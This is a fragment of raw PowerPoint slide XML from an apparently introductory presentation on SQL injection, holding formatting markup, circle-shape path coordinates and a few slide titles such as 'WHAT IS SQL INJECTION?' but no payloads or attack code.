                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1650" spc="-114">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>page	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1650" spc="-30">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>‘e’ </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1650" spc="-200">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>IS </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1650" spc="-20">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1650" spc="-10">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>first </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1650" spc="-65">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>character </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1650" spc="-5">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1650" spc="-20">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1650" spc="-95">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>hashed</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1650">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1650" spc="-90">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>password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342201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80"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-225"/>
              <a:t>g</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-360"/>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-140"/>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-235"/>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-395"/>
              <a:t>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26554" y="3594770"/>
            <a:ext cx="2250440" cy="2249805"/>
            <a:chOff x="2426554" y="3594770"/>
            <a:chExt cx="2250440" cy="2249805"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="object 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2426554" y="3594770"/>
              <a:ext cx="2250440" cy="2249805"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2250440" h="2249804">
                  <a:moveTo>
                    <a:pt x="1124929" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1076132" y="1039"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1027866" y="4128"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="980173" y="9226"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="933095" y="16289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="886676" y="25277"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="840956" y="36145"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="795978" y="48853"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="751784" y="63358"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="708417" y="79618"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="665918" y="97591"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="624330" y="117234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="583696" y="138505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="544056" y="161362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="505454" y="185763"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="467932" y="211666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="431532" y="239028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="396295" y="267807"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="362266" y="297962"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="329484" y="329449"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297994" y="362227"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="267836" y="396253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="239054" y="431485"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="211688" y="467881"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="185783" y="505399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="161379" y="543997"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138520" y="583632"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="117246" y="624262"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97601" y="665845"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79626" y="708339"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63365" y="751702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48858" y="795890"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36149" y="840863"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25279" y="886578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16291" y="932992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9227" y="980064"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4129" y="1027751"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1039" y="1076012"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1124803"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1039" y="1173595"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4129" y="1221856"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9227" y="1269544"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16291" y="1316617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25279" y="1363032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36149" y="1408747"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48858" y="1453720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63365" y="1497910"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79626" y="1541273"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97601" y="1583767"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="117246" y="1625350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138520" y="1665981"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="161379" y="1705616"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="185783" y="1744214"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="211688" y="1781733"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="239054" y="1818129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="267836" y="1853362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297994" y="1887388"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="329484" y="1920166"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="362266" y="1951654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="396295" y="1981808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="431532" y="2010588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="467932" y="2037950"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="505454" y="2063853"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="544056" y="2088254"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="583696" y="2111111"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="624330" y="2132383"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="665918" y="2152026"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="708417" y="2169998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="751784" y="2186258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="795978" y="2200763"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="840956" y="2213471"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="886676" y="2224340"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="933095" y="2233327"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="980173" y="2240390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1027866" y="2245488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1076132" y="2248578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1124929" y="2249617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1173725" y="2248578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1221990" y="2245488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1269682" y="2240390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1316759" y="2233327"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1363178" y="2224340"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1408897" y="2213471"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1453875" y="2200763"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1498068" y="2186258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1541435" y="2169998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1583933" y="2152026"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1625520" y="2132383"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1666155" y="2111111"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1705794" y="2088254"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1744395" y="2063853"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1781917" y="2037950"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1818317" y="2010588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1853553" y="1981808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1887583" y="1951654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1920364" y="1920166"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1951854" y="1887388"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1982012" y="1853362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2010794" y="1818129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2038159" y="1781733"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2064064" y="1744214"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2088468" y="1705616"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2111328" y="1665981"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2132601" y="1625350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2152246" y="1583767"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2170220" y="1541273"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2186482" y="1497910"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2200988" y="1453720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2213698" y="1408747"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2224568" y="1363032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2233556" y="1316617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2240620" y="1269544"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2245718" y="1221856"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2248808" y="1173595"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2249847" y="1124803"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2248808" y="1076012"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2245718" y="1027751"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2240620" y="980064"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2233556" y="932992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2224568" y="886578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2213698" y="840863"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2200988" y="795890"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2186482" y="751702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2170220" y="708339"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2152246" y="665845"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2132601" y="624262"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2111328" y="583632"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2088468" y="543997"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2064064" y="505399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2038159" y="467881"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2010794" y="431485"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1982012" y="396253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1951854" y="362227"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1920364" y="329449"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1887583" y="297962"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1853553" y="267807"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1818317" y="239028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1781917" y="211666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1744395" y="185763"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1705794" y="161362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1666155" y="138505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1625520" y="117234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1583933" y="97591"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1541435" y="79618"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1498068" y="63358"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1453875" y="48853"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1408897" y="36145"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1363178" y="25277"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1316759" y="16289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1269682" y="9226"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1221990" y="4128"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1173725" y="1039"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1124929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05042" y="4073593"/>
              <a:ext cx="1294201" cy="129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173139" y="6447418"/>
            <a:ext cx="2757170" cy="121920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37160" marR="5080" indent="-125095">
              <a:lnSpc>
                <a:spcPts val="4450"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="660"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="4100" spc="-445">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>WHAT </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4100" spc="-475">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>IS </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4100" spc="-605">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SQL  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4100" spc="-440">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>INJECTION?</a:t>
            </a:r>
            <a:endParaRPr sz="4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59950" y="3594770"/>
            <a:ext cx="2249805" cy="2249805"/>
            <a:chOff x="6759950" y="3594770"/>
            <a:chExt cx="2249805" cy="2249805"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="object 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6759950" y="3594770"/>
              <a:ext cx="2249805" cy="2249805"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2249804" h="2249804">
                  <a:moveTo>
                    <a:pt x="1124803" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1076011" y="1039"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1027750" y="4128"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="980062" y="9226"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="932990" y="16289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="886575" y="25277"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="840860" y="36145"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="795886" y="48853"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="751697" y="63358"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="708335" y="79618"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="665841" y="97591"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="624258" y="117234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="583627" y="138505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="543992" y="161362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="505395" y="185763"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="467877" y="211666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="431481" y="239028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="396248" y="267807"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="362223" y="297962"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="329445" y="329449"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297958" y="362227"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="267804" y="396253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="239025" y="431485"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="211663" y="467881"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="185760" y="505399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="161360" y="543997"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138503" y="583632"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="117232" y="624262"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97589" y="665845"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79617" y="708339"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63357" y="751702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48852" y="795890"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36145" y="840863"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25276" y="886578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16289" y="932992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9226" y="980064"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4128" y="1027751"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1039" y="1076012"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1124803"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1039" y="1173595"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4128" y="1221856"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9226" y="1269544"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16289" y="1316617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25276" y="1363032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36145" y="1408747"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48852" y="1453720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63357" y="1497910"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79617" y="1541273"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97589" y="1583767"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="117232" y="1625350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138503" y="1665981"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="161360" y="1705616"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="185760" y="1744214"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="211663" y="1781733"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="239025" y="1818129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="267804" y="1853362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297958" y="1887388"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="329445" y="1920166"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="362223" y="1951654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="396248" y="1981808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="431481" y="2010588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="467877" y="2037950"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="505395" y="2063853"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="543992" y="2088254"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="583627" y="2111111"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="624258" y="2132383"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="665841" y="2152026"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="708335" y="2169998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="751697" y="2186258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="795886" y="2200763"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="840860" y="2213471"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="886575" y="2224340"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="932990" y="2233327"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="980062" y="2240390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1027750" y="2245488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1076011" y="2248578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1124803" y="2249617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1173595" y="2248578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1221856" y="2245488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1269544" y="2240390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1316617" y="2233327"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1363032" y="2224340"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1408747" y="2213471"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1453720" y="2200763"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1497910" y="2186258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1541273" y="2169998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1583767" y="2152026"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1625350" y="2132383"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1665981" y="2111111"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1705616" y="2088254"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1744214" y="2063853"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1781733" y="2037950"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1818129" y="2010588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1853362" y="1981808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1887388" y="1951654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1920166" y="1920166"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1951654" y="1887388"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1981808" y="1853362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2010588" y="1818129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2037950" y="1781733"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2063853" y="1744214"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2088254" y="1705616"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2111111" y="1665981"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2132383" y="1625350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2152026" y="1583767"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2169998" y="1541273"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2186258" y="1497910"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2200763" y="1453720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2213471" y="1408747"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2224340" y="1363032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2233327" y="1316617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2240390" y="1269544"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2245488" y="1221856"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2248578" y="1173595"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2249617" y="1124803"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2248578" y="1076012"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2245488" y="1027751"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2240390" y="980064"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2233327" y="932992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2224340" y="886578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2213471" y="840863"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2200763" y="795890"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2186258" y="751702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2169998" y="708339"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2152026" y="665845"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2132383" y="624262"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2111111" y="583632"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2088254" y="543997"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2063853" y="505399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2037950" y="467881"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2010588" y="431485"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1981808" y="396253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1951654" y="362227"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1920166" y="329449"/>
                  </a:lnTo>
